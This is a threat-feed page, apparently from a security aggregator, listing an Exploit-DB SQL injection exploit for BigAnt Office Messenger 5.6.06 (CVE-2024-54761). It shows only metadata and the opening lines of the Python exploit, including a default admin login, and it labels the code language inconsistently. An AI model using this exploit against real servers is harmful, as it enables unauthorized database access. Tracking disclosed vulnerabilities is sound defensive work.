Skip to main content

BigAnt Office Messenger 5.6.06 - SQL Injection

Medium
Exploitwebexploit
Published: Mon Aug 18 2025 (08/18/2025, 00:00:00 UTC)
Source: Exploit-DB RSS Feed

Description

BigAnt Office Messenger 5.6.06 - SQL Injection

Technical Details

Edb Id
52412
Has Exploit Code
true
Code Language
python

Indicators of Compromise

Exploit Source Code

Exploit Code

Exploit code for BigAnt Office Messenger 5.6.06 - SQL Injection

# Exploit Title: BigAnt Office Messenger 5.6.06 - SQL Injection
# Date: 01.09.2025 
# Exploit Author: Nicat Abbasov 
# Vendor Homepage: https://www.bigantsoft.com/ 
# Software Link: https://www.bigantsoft.com/download.html 
# Version: 5.6.06 
# Tested on: 5.6.06 
# CVE : CVE-2024-54761
# Github repo: https://github.com/nscan9/CVE-2024-54761

import requests
from bs4 import BeautifulSoup
import base64

class Exploit:
    def __init__(self, rhost, rport=8000, username='admin', password='123456'):
... (5537 more characters)
Code Length: 6,037 characters • Language: PHP

Threat ID: 68a3d92dad5a09ad00eed720

Added to database: 8/19/2025, 1:53:49 AM

Last updated: 8/19/2025, 1:53:49 AM

Views: 1

Actions

Please log in to the Console to use AI analysis features.

Need enhanced features?

Contact root@offseq.com for Pro access with improved analysis and higher rate limits.

Latest Threats